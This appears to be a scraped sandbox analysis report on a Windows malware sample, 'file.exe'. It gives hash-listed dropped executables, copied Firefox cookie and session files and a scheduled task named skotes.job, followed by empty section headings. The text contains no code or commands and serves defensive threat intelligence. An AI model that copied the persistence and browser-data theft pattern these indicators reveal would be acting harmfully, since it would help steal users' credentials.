C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	PE32 executable (GUI) Intel 80386, for MS Windows	85B5560CBE6CB2FC83058376490E1CFE	82BB2E2A898FDD100971C8981AD66A871CA6C1CB	4F9DA76F7D0BDD4E31D23BAC0B4E260F91A0CC6878C787EC7C74D07476F1F3A7
C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	PE32 executable (GUI) Intel 80386, for MS Windows	85B5560CBE6CB2FC83058376490E1CFE	82BB2E2A898FDD100971C8981AD66A871CA6C1CB	4F9DA76F7D0BDD4E31D23BAC0B4E260F91A0CC6878C787EC7C74D07476F1F3A7
C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	PE32 executable (GUI) Intel 80386, for MS Windows	9133E5DB092F1C3026308DFEA85F0EBA	16B85CF34C8B8176656D2E443537427A16E17CBD	47A37BFE21C5ED0CC6E3B5FD355A8A71CCC63E6AF19A7A3B19DBF0F0C12F78AB
C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	PE32 executable (GUI) Intel 80386, for MS Windows	3833A1B7C23D66EECEC6B16DDF5CF540	05182934E239A8E6715ADA16E0DDCDE3B7598E05	96F09E8BD3F67C287A0BB1529D5220D9496A233FBA5B1608366A2C280A864DD2
C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	PE32 executable (GUI) Intel 80386, for MS Windows	3833A1B7C23D66EECEC6B16DDF5CF540	05182934E239A8E6715ADA16E0DDCDE3B7598E05	96F09E8BD3F67C287A0BB1529D5220D9496A233FBA5B1608366A2C280A864DD2
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	PE32 executable (GUI) Intel 80386, for MS Windows	85B5560CBE6CB2FC83058376490E1CFE	82BB2E2A898FDD100971C8981AD66A871CA6C1CB	4F9DA76F7D0BDD4E31D23BAC0B4E260F91A0CC6878C787EC7C74D07476F1F3A7
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js	ASCII text, with very long lines (1809), with CRLF line terminators	824B654832E313787953C52941C09765	74814560FF5E244BC3B6ACA16313AE53553BCD50	1F7839E332B88E9F24361636F0C0AA5E52DDB8B04A8C5E21710F3796EE847EA7
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)	ASCII text, with very long lines (1809), with CRLF line terminators	824B654832E313787953C52941C09765	74814560FF5E244BC3B6ACA16313AE53553BCD50	1F7839E332B88E9F24361636F0C0AA5E52DDB8B04A8C5E21710F3796EE847EA7
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)	JSON data	EA8B62857DFDBD3D0BE7D7E4A954EC9A	B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A	792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp	JSON data	EA8B62857DFDBD3D0BE7D7E4A954EC9A	B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A	792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
C:\Windows\Tasks\skotes.job	data	C4F6DBDA57840318531E13D72AFAA857	317583317F847406C6648A6655EE95B69662B4F3	7E931E765E59EAB0148F72F0AA5E13688A7DEFA2AB9684819905637C8FBFF8B6

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by